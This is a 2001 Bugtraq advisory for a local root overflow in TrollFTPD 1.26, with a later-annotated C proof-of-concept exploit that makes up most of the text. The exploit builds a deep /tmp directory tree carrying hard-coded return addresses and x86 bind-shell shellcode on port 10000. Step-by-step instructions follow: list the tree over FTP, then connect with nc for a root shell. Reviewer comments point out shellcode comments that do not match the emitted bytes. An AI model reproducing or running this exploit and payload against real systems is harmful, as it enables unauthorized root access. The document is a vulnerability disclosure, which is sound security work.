From: zen-parse <zen-parse@gmx.net> To: <bugtraq@securityfocus.com> Subject: Local exploit for TrollFTPD-1.26 Date: Mon, 13 Aug 2001 15:22:22 +1200 (NZST) Affects: TrollFTPD 1.26 (probably earlier) Severity: local users can gain root access. Fix: upgrade to TrollFTPD-1.27 Fix URL: ftp://ftp.trolltech.com/freebies/ftpd/troll-ftpd-1.27.tar.gz Description: An error in the handling of recursive directory listings can result in an exploitable buffer overflow. Exploit: (Offsets are for one machine; they are not guaranteed to work on any others.) Run the program, ftp localhost <in ftp> (your username) (your password) cd /tmp ls -R <out of ftp> Connect to port 10000 with nc Be nice. -- zen-parse -- ------------------------------------------------------------------------- The preceding information, unless directly posted by zen-parse@gmx.net to an open forum is confidential information and not to be distributed (without explicit permission being given by zen-parse@gmx.net). Legal action may be taken to enforce this. If you are mum or dad, this probably doesn't apply to you. 
/*
 * Proof-of-concept program attached to the advisory above (TrollFTPD 1.26,
 * overflow in recursive directory-listing handling).  Code kept token-for-token;
 * only comments were added and line breaks restored.
 *
 * NOTE(review): there are no #include lines, `main` is declared without a
 * return type, and the locals z0, z1 and g are never read; strlen() results
 * are printed with "%d" rather than "%zu".  This is a throwaway PoC, not
 * code to build on.
 */

/*
 * Payload placed in the final directory name.  The instruction comments are
 * the original author's; per the advisory it listens on port 10000
 * (the `push word 4135` immediate is 0x1027, i.e. 10000 in network byte order).
 * NOTE(review): the two "push dword" comments near the end name values
 * (68732f6eh / 69622f2fh) that do not match the bytes actually emitted
 * (four 0x55 each).  The `cp /bin/sh ... UUUUUUUU` below suggests the 0x55
 * bytes are the intended path -- confirm before trusting the comments.
 */
char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"   // run of 0x90 (NOP) bytes
    "\x31\xdb"             // xor ebx, ebx
    "\xf7\xe3"             // mul ebx
    "\xb0\x66"             // mov al, 102
    "\x53"                 // push ebx
    "\x43"                 // inc ebx
    "\x53"                 // push ebx
    "\x43"                 // inc ebx
    "\x53"                 // push ebx
    "\x89\xe1"             // mov ecx, esp
    "\x4b"                 // dec ebx
    "\xcd\x80"             // int 80h
    "\x89\xc7"             // mov edi, eax
    "\x52"                 // push edx
    "\x66\x68\x27\x10"     // push word 4135
    "\x43"                 // inc ebx
    "\x66\x53"             // push bx
    "\x89\xe1"             // mov ecx, esp
    "\xb0\x10"             // mov al, 16
    "\x50"                 // push eax
    "\x51"                 // push ecx
    "\x57"                 // push edi
    "\x89\xe1"             // mov ecx, esp
    "\xb0\x66"             // mov al, 102
    "\xcd\x80"             // int 80h
    "\xb0\x66"             // mov al, 102
    "\xb3\x04"             // mov bl, 4
    "\xcd\x80"             // int 80h
    "\x50"                 // push eax
    "\x50"                 // push eax
    "\x57"                 // push edi
    "\x89\xe1"             // mov ecx, esp
    "\x43"                 // inc ebx
    "\xb0\x66"             // mov al, 102
    "\xcd\x80"             // int 80h
    "\x89\xd9"             // mov ecx, ebx
    "\x89\xc3"             // mov ebx, eax
    "\xb0\x3f"             // mov al, 63
    "\x49"                 // dec ecx
    "\xcd\x80"             // int 80h
    "\x41"                 // inc ecx
    "\xe2\xf8"             // loop lp
    "\x51"                 // push ecx
    "\x68\x55\x55\x55\x55" // push dword 68732f6eh  (NOTE(review): bytes are 0x55, see header comment)
    "\x68\x55\x55\x55\x55" // push dword 69622f2fh  (NOTE(review): bytes are 0x55, see header comment)
    "\x89\xe3"             // mov ebx, esp
    "\x51"                 // push ecx
    "\x53"                 // push ebx
    "\x89\xe1"             // mov ecx, esp
    "\xb0\x0b"             // mov al, 11
    "\xcd\x80";            // int 80h

/*
 * Builds the directory tree under /tmp that the advisory then has the victim
 * server walk with `ls -R`.  The path is padded with fixed 40-byte components
 * until it is about 4040 bytes long; the last component carries a0 and a1
 * (two hard-coded addresses -- the advisory says they fit one machine only)
 * followed by the payload.  Everything is created mode 0777 under /tmp.
 * Exits with status 1 if the padded path cannot be entered.
 */
main() {
    char dir[8000];
    char nir[8000];
    int z0=0,a0=0x080597f8;   /* z0 is never used; a0 is a machine-specific address */
    int z1=0,a1=0xbff96450;   /* z1 is never used; a1 is a machine-specific address */
    int g;                    /* never used */
    strcpy(dir,"/tmp/retroll/");
    mkdir(dir,0777);
    printf("%d\n",strlen(shellcode));   /* NOTE(review): size_t printed with %d */
    /* Extend the path one 40-byte component at a time, creating each level. */
    while(strlen(dir)<4040) {
        strcat(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
        mkdir(dir,0777);
    }
    // 4048 so far leaving 48 left.
    if(chdir(dir)){perror("chdir");exit(1);}
    printf("%d + ",strlen(dir));
    /* From here on `dir` is reused for names relative to the deepest level. */
    sprintf(dir,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
    mkdir(dir,0777);
    /* Fixed command string (no user input), so no injection concern here;
     * system() is still a shell spawn and inherits the caller's environment. */
    system("cp /bin/sh AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/UUUUUUUU");
    sprintf(nir,"%sAAAAAAAAAAAAAAAAAAAAAAAA",dir);
    /* NOTE(review): passing &a0 and &a1 to "%s" reads the raw bytes of each
     * int as a C string; termination depends on whatever follows them on the
     * stack, which is undefined behaviour and part of why the offsets are
     * machine-specific. */
    sprintf(dir,"%sGGGG=AAAAAAA%sAAAAAAAAAAAA%sCCCC%s",nir,&a0,&a1,shellcode);
    printf("%d = ",strlen(dir));
    mkdir(dir,0777);
}